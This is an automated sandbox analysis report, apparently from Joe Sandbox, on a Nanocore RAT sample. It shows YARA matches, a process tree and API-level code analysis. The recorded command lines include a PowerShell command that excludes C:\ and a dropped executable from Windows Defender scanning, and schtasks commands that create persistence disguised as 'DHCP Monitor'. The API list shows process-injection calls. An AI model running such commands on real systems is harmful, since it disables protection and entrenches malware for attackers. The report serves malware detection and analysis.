                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Antivirus matches:
                              • Detection: 0%, Virustotal
                              • Detection: 0%, Metadefender
                              • Detection: 0%, ReversingLabs
                              Reputation:high

                              General

                              Start time:08:27:42
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
                              Imagebase:0x880000
                              File size:430592 bytes
                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              General

                              Start time:08:27:43
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:46
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:47
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                              Imagebase:0x990000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:high

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\SysWOW64\schtasks.exe
                              Wow64 process (32bit):true
                              Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
                              Imagebase:0xdd0000
                              File size:185856 bytes
                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:08:27:49
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:08:27:51
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                              Imagebase:0xe60000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Antivirus matches:
                              • Detection: 0%, Virustotal
                              • Detection: 0%, Metadefender
                              • Detection: 0%, ReversingLabs

                              General

                              Start time:08:27:52
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Start time:08:27:59
                              Start date:03/08/2021
                              Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              Wow64 process (32bit):true
                              Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                              Imagebase:0xdf0000
                              File size:64616 bytes
                              MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Start time:08:28:00
                              Start date:03/08/2021
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff724c50000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Disassembly

                              Code Analysis

                                Executed Functions

                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 993de69dc0928159eaeb0ea9c923bf4687613b1c6e9d10c015ab1c609b9f07cb
                                • Instruction ID: a2bbe84f199a3e6988d4dedfd15d26c0d0c8ab86763c676ba694931b4c453a10
                                • Opcode Fuzzy Hash: 993de69dc0928159eaeb0ea9c923bf4687613b1c6e9d10c015ab1c609b9f07cb
                                • Instruction Fuzzy Hash: CFE1CCB1700A458FEB29DB76C450BAFB7FAAF89304F144469E146EB391CB35E901CB61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 045ec64ab54e4ded4ea0783a8d59a719169ee49c2d7a32b06f0c72c1570dcea3
                                • Instruction ID: a3d7228d7d44365485d1f92d97970c536d7d23f317d1f34dd79b268ab8552134
                                • Opcode Fuzzy Hash: 045ec64ab54e4ded4ea0783a8d59a719169ee49c2d7a32b06f0c72c1570dcea3
                                • Instruction Fuzzy Hash: 3FA1A375E00319CFCB04DBA0D894ADDBBB6FF89314F158615E415AB364EF30A986DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0793A386
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 0acaf3b4a830bef107310f0c563da83c4529f203d9b72d5fbc9481343ac4ea88
                                • Instruction ID: de1747fbab63415de6628e94591d631512fa54ecc6789b100c1c9b9b04ef891f
                                • Opcode Fuzzy Hash: 0acaf3b4a830bef107310f0c563da83c4529f203d9b72d5fbc9481343ac4ea88
                                • Instruction Fuzzy Hash: C7915BB1D0021ACFDB10CFA4C885BEDBBB6FB48318F058569E858B7240DB759985CF91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03A240DC,02A40110,?,00000000), ref: 04F47136
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CallbackDispatcherUser
                                • String ID:
                                • API String ID: 2492992576-0
                                • Opcode ID: 87e37a93b46b319e2292cf2b8849a315bef927f8b6ae6eddd8f27c4c2080a41a
                                • Instruction ID: 900abe411e65ed1e05ac39455072be566b8e65f6a3715e0961fa072a4b23bc00
                                • Opcode Fuzzy Hash: 87e37a93b46b319e2292cf2b8849a315bef927f8b6ae6eddd8f27c4c2080a41a
                                • Instruction Fuzzy Hash: 57715F74A01248EFDB15DFA9D894D9EBBB6BF88714F114498F901AB361DB31EC82CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F418CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: 9545d90c08b76c1eb480da85a1de1d00ce520cc5b382c7c160625d7a1b4b9e61
                                • Instruction ID: c73dee5aaa45a61abb413dd022a76c4add82b4ae272b8e2d16cb582b042b7e56
                                • Opcode Fuzzy Hash: 9545d90c08b76c1eb480da85a1de1d00ce520cc5b382c7c160625d7a1b4b9e61
                                • Instruction Fuzzy Hash: B351C2B1D002099FDF15CF99C984ADEBFB5FF88314F14812AE418AB210D775A986CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetWindowTextW.USER32(?,00000000,?), ref: 0793ABBC
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: TextWindow
                                • String ID:
                                • API String ID: 530164218-0
                                • Opcode ID: 11208e74d38cfbe970124e6c1d38e37e00e6e2c749ca7ff6384c76fcc1c6fde7
                                • Instruction ID: ae5833e9488f7b6f5f79a884ed0046df2ab8eb6a595c992ad4735c260cb8cd5f
                                • Opcode Fuzzy Hash: 11208e74d38cfbe970124e6c1d38e37e00e6e2c749ca7ff6384c76fcc1c6fde7
                                • Instruction Fuzzy Hash: DA5102B0D002198FDB14CFA9C894B9EBBB5EF48318F15C12AE859BB350C774A845CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F418CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CreateWindow
                                • String ID:
                                • API String ID: 716092398-0
                                • Opcode ID: bd5706c2f75ceea1454be08edab99e9e1d0a1fab6541bd7052efd99df6d4e9f2
                                • Instruction ID: 26bde4879ebcdb2847b610de70053d8ef02cd0464bef0f30040b576e5636dd22
                                • Opcode Fuzzy Hash: bd5706c2f75ceea1454be08edab99e9e1d0a1fab6541bd7052efd99df6d4e9f2
                                • Instruction Fuzzy Hash: 5641A3B1D003199FDF14CF99C984ADEBFB5BF88314F24812AE419AB210D774A986CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 0793AF49
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: BaseModuleName
                                • String ID:
                                • API String ID: 595626670-0
                                • Opcode ID: ce62b14cca8df469f94189d5706e79f238fc3f6d1ead83cff1ced1f599271c04
                                • Instruction ID: d04602e5449e4a272620a95de1a0087eeb3e35ac335752604e756480991e408f
                                • Opcode Fuzzy Hash: ce62b14cca8df469f94189d5706e79f238fc3f6d1ead83cff1ced1f599271c04
                                • Instruction Fuzzy Hash: 5F4134B0D042598FCB14CFA9C895B9EBBF5FF48318F14C12AE859AB340D7749845CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F43E01
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: CallProcWindow
                                • String ID:
                                • API String ID: 2714655100-0
                                • Opcode ID: 70c7696bf5975245235fc58c5091a76f118a7f3424c97397211c253cfab86128
                                • Instruction ID: ffc378857c12f44db74c3a154d982917954c60960411edfd3821b7fe4d01170b
                                • Opcode Fuzzy Hash: 70c7696bf5975245235fc58c5091a76f118a7f3424c97397211c253cfab86128
                                • Instruction Fuzzy Hash: F3413AB4A00309CFCB14CF99C488A9ABBF5FF88314F14C559D919AB321D774A946CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CopyFileW.KERNELBASE(?,00000000,?), ref: 07937439
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CopyFile
                                • String ID:
                                • API String ID: 1304948518-0
                                • Opcode ID: 66391f2dc9726f02265ac592f2a06f3edae82ac33d3a633ce7bc9e88a2f9f1e4
                                • Instruction ID: be586ae0c56701a4aa98c878ddbefb65069a3ba8db447cb1925772e76c5be8e2
                                • Opcode Fuzzy Hash: 66391f2dc9726f02265ac592f2a06f3edae82ac33d3a633ce7bc9e88a2f9f1e4
                                • Instruction Fuzzy Hash: 8B2148B1D012199FDB00CF99D5847EEFBF5EF48210F18816AE818F7241D7789A41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CopyFileW.KERNELBASE(?,00000000,?), ref: 07937439
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: CopyFile
                                • String ID:
                                • API String ID: 1304948518-0
                                • Opcode ID: 0424842de0488476a84a0423995439e93de0cab233e386439ec8a13522a054e1
                                • Instruction ID: b93579c7990b07c3e9c3003dc5f8d6c8f4ddae2ccd12fd82a426dc97e1b6fb0b
                                • Opcode Fuzzy Hash: 0424842de0488476a84a0423995439e93de0cab233e386439ec8a13522a054e1
                                • Instruction Fuzzy Hash: 60212CB1D012199FDB50CF9AD4847EEFBF5EF48310F14816AD818A7241D7749A45CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07939FD8
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: adcbae28d5fa6d1fa8ce7fbeeb97986f97d7327497f137b66de89af11031c3e7
                                • Instruction ID: 0597be27f723d513c9f504c3215a8de7d65dcb82b3afc254f89b3c4cbd57ed47
                                • Opcode Fuzzy Hash: adcbae28d5fa6d1fa8ce7fbeeb97986f97d7327497f137b66de89af11031c3e7
                                • Instruction Fuzzy Hash: 12213BB19003599FCF00DFA9C885BDEBBF5FF48314F008429E918A7240C7B8A945CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0793A86B
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumProcesses
                                • String ID:
                                • API String ID: 84517404-0
                                • Opcode ID: 9b8bb7dce474029bf8bd073a66ace8624b102a87aff6d5affb15d0f17da6fafb
                                • Instruction ID: 2cd8669a7d97237296fbd42faf00eda266458018af57cd92b1bab88e64084cc1
                                • Opcode Fuzzy Hash: 9b8bb7dce474029bf8bd073a66ace8624b102a87aff6d5affb15d0f17da6fafb
                                • Instruction Fuzzy Hash: 032119B1D0021A9FDB00CF99D884BDEFBB4FB48224F04822AE558A3240D774A945CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetThreadContext.KERNELBASE(?,00000000), ref: 07939D6E
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: ContextThread
                                • String ID:
                                • API String ID: 1591575202-0
                                • Opcode ID: 9bff1154b4164f6026dca0cea278f1d147df964d298d3bb3615376305d2b7f07
                                • Instruction ID: 8a7e6702a09688061f99c86cb4f18ff0d1ceb2cd89d8dd72547f0f87ced29b31
                                • Opcode Fuzzy Hash: 9bff1154b4164f6026dca0cea278f1d147df964d298d3bb3615376305d2b7f07
                                • Instruction Fuzzy Hash: F12129B1D043098FDB10DFAAC4857EFBBF4EF48268F148429D559A7240CBB8A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 0793A86B
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumProcesses
                                • String ID:
                                • API String ID: 84517404-0
                                • Opcode ID: 18e8335cee8a3e202bb4ebd8a5a2f3925363a2113c369e5951a57c2c108bcc54
                                • Instruction ID: fac489df3ae7541a120104ac6e14f98d0d54f20787f832a9a9ea631449b375df
                                • Opcode Fuzzy Hash: 18e8335cee8a3e202bb4ebd8a5a2f3925363a2113c369e5951a57c2c108bcc54
                                • Instruction Fuzzy Hash: 332107B1D002199FDB00CF9AC884BDEFBF4FB48314F04812AE518B3240D778A945CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumChildWindows.USER32(?,00000000,?), ref: 0793B8F0
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: ChildEnumWindows
                                • String ID:
                                • API String ID: 3555792229-0
                                • Opcode ID: 36232769db79ae07a8726e9a3c02c7d7799ba827e91717774954839f5d679e6b
                                • Instruction ID: 5f14b4a685db543102f8f56b0aacea3f048aa234058c707d8cb533493dbc478e
                                • Opcode Fuzzy Hash: 36232769db79ae07a8726e9a3c02c7d7799ba827e91717774954839f5d679e6b
                                • Instruction Fuzzy Hash: 092115B1D002198FDB14CF9AC844BEEFBF5EF88314F14842AE459A3250C778A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0793AD83
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: EnumModulesProcess
                                • String ID:
                                • API String ID: 1082081703-0
                                • Opcode ID: 34d2c70b322a4a3c82e69ada0917e86d933d3ab936c6e090e468163e4f95cd8f
                                • Instruction ID: d4ee62efd94de6fe74a81e05a2f43eb77d912a02ba7c8bdf2a3bee4c4dc9d5ce
                                • Opcode Fuzzy Hash: 34d2c70b322a4a3c82e69ada0917e86d933d3ab936c6e090e468163e4f95cd8f
                                • Instruction Fuzzy Hash: B32114B5D002099FCB10DF9AC484BDEBBF4FF48324F148429E568A7240D778AA45CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07939EC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 41e0362df303ccbf5f5265013cfbcb58feea4a9336231b6da4f11f9d3cbe0d49
                                • Instruction ID: 743f36abb69eb94fd2b959ec6510bcdba772f4b3b491e610ef2e5608cdd174fe
                                • Opcode Fuzzy Hash: 41e0362df303ccbf5f5265013cfbcb58feea4a9336231b6da4f11f9d3cbe0d49
                                • Instruction Fuzzy Hash: FC1137B59042499FCF10DFAAC844BDFBBF5EF48324F148819D565A7250C7B5A944CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0793BFCD
                                Memory Dump Source
                                • Source File: 00000000.00000002.850327224.0000000007930000.00000040.00000001.sdmp, Offset: 07930000, based on PE: false
                                Similarity
                                • API ID: MessagePost
                                • String ID:
                                • API String ID: 410705778-0
                                • Opcode ID: c1fabbc7a370f9ddceeb095917f8c86cf6bab2cc07d8a02549a669c202e9827f
                                • Instruction ID: 32609d2115ea5df3811eed27f573f86c9836f10cf1b5f5b99fce6cc6b583be60
                                • Opcode Fuzzy Hash: c1fabbc7a370f9ddceeb095917f8c86cf6bab2cc07d8a02549a669c202e9827f
                                • Instruction Fuzzy Hash: 8F1103B58043499FCB50DF99C889BDEBBF8FB48324F108419E914B7200C3B4A984CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 04F41A5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: 5b0b90e36f214e11fb5a331182dbf0f3376744b7ae48befd83e1f67478c56b83
                                • Instruction ID: 61988de2650e9df88fbd98a7371d525f98420e9719c786609291437876866f3a
                                • Opcode Fuzzy Hash: 5b0b90e36f214e11fb5a331182dbf0f3376744b7ae48befd83e1f67478c56b83
                                • Instruction Fuzzy Hash: 521103B58002498FDB10CF99D588BDFBBF4EB89324F14851AD868B7341C3B4A945CFA2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetWindowLongW.USER32(?,?,?), ref: 04F41A5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID: LongWindow
                                • String ID:
                                • API String ID: 1378638983-0
                                • Opcode ID: a0cbbf5fe1b8569339c7978cc26ba486dc349e1f3b196d7b7de3a72029ad4e43
                                • Instruction ID: fce837c10e07bbb0bb27a5fc6c233bb33dee798e12583663b800e3fb410932c6
                                • Opcode Fuzzy Hash: a0cbbf5fe1b8569339c7978cc26ba486dc349e1f3b196d7b7de3a72029ad4e43
                                • Instruction Fuzzy Hash: 2611D3B58002499FDB10DF99D588BDFBBF8EB88324F14851AD969B7240C3B4A945CFA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9dd7e05a22b66e3193a266c6aed689ec13f07a2f039d1f61c00dd52c54afe500
                                • Instruction ID: fcc10f9555d2e074647c83bff27d0f483922597eaeeb7d07d7a664c520444b84
                                • Opcode Fuzzy Hash: 9dd7e05a22b66e3193a266c6aed689ec13f07a2f039d1f61c00dd52c54afe500
                                • Instruction Fuzzy Hash: 1212C9B1611F46CAD710CF55FC8838A3BA1B745328F904308DA699BBF9D7B8254ACF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.836746480.0000000004F40000.00000040.00000001.sdmp, Offset: 04F40000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b2767195b1326a312ced977eee5adcdeab3f9a135f51a5f24cd069ac8b1b8797
                                • Instruction ID: 18643946a1bbd968c892a5823282f6a4a7c8f845506958b02ead336ebd612746
                                • Opcode Fuzzy Hash: b2767195b1326a312ced977eee5adcdeab3f9a135f51a5f24cd069ac8b1b8797
                                • Instruction Fuzzy Hash: 45C11DB1A11B45CAD710DF65FC8838A3B71BB85328F504309D969AB7E8D7B8244ACF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Executed Functions

                                Memory Dump Source
                                • Source File: 0000000D.00000002.942385928.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b04f776d642b08bd375721d3342e5bf8525545be0cc0e0904e838d0f92ad4f50
                                • Instruction ID: 6464bf07d5160c72271f38b780f263fae67d333f3bbaa42fe472e6aabb38fddb
                                • Opcode Fuzzy Hash: b04f776d642b08bd375721d3342e5bf8525545be0cc0e0904e838d0f92ad4f50
                                • Instruction Fuzzy Hash: 0851AC71D05259DFDB10EFA9D884ADEFBF4FF49310F10816AE918A7244D7309918CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.939785799.0000000006190000.00000040.00000001.sdmp, Offset: 06190000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: da236de599c2c75c69222585dd57b009b42982993898b112c1e236ee88d5b614
                                • Instruction ID: 9c105692cea8b618c39aca19b92622cb98c05947443e3c89eccab869b4c06bec
                                • Opcode Fuzzy Hash: da236de599c2c75c69222585dd57b009b42982993898b112c1e236ee88d5b614
                                • Instruction Fuzzy Hash: CB510374E15208EFCB44DFA4D998AADBBB2FB89300F108069E905A7364DB34AE45CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 00ECB730
                                • GetCurrentThread.KERNEL32 ref: 00ECB76D
                                • GetCurrentProcess.KERNEL32 ref: 00ECB7AA
                                • GetCurrentThreadId.KERNEL32 ref: 00ECB803
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 0e047e5dc77a0d73f9096d17c5df9d1238d69952052ccf311df736cf1d06c720
                                • Instruction ID: 8151a507840d985deebc4b62b7d5d46b292cb49a7e9c8bd7fccf3128ac59bc28
                                • Opcode Fuzzy Hash: 0e047e5dc77a0d73f9096d17c5df9d1238d69952052ccf311df736cf1d06c720
                                • Instruction Fuzzy Hash: BE5153B4D002488FDB14CFA9D689B9EBBF0BB88304F20856AE419B7350C7B59945CF65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 00ECB730
                                • GetCurrentThread.KERNEL32 ref: 00ECB76D
                                • GetCurrentProcess.KERNEL32 ref: 00ECB7AA
                                • GetCurrentThreadId.KERNEL32 ref: 00ECB803
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: c72845b5c288590783dec2cb63754332e2a47443564092045a9c10fe6a24a5ff
                                • Instruction ID: d7eebfa34054e51b5b3abbd43b714b7c5e7fb7383044f02d74acce4d113dd990
                                • Opcode Fuzzy Hash: c72845b5c288590783dec2cb63754332e2a47443564092045a9c10fe6a24a5ff
                                • Instruction Fuzzy Hash: 585154B4D002488FDB14CFA9D689B9EBBF0BF88304F20856AE419B7350C7B59945CF65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f1832e9acb82934cd81e8d0ae5de59f37554b71fc217055e360af380bb9488bf
                                • Instruction ID: 79e6d87194c3178f349e01a14f9befcbd351330ca1df8600ff15b34514f88c76
                                • Opcode Fuzzy Hash: f1832e9acb82934cd81e8d0ae5de59f37554b71fc217055e360af380bb9488bf
                                • Instruction Fuzzy Hash: ECA180719093889FCB16CFA5C951ACDBFB1FF4A304F1981AAE448AF262C7359846CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetModuleHandleW.KERNEL32(00000000), ref: 00EC962E
                                Memory Dump Source
                                • Source File: 0000000D.00000002.930144018.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: false
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: cb311316866387953e425fe0d48a3ad62e4a2cef9fbd9bf6667c6a8495c325c8
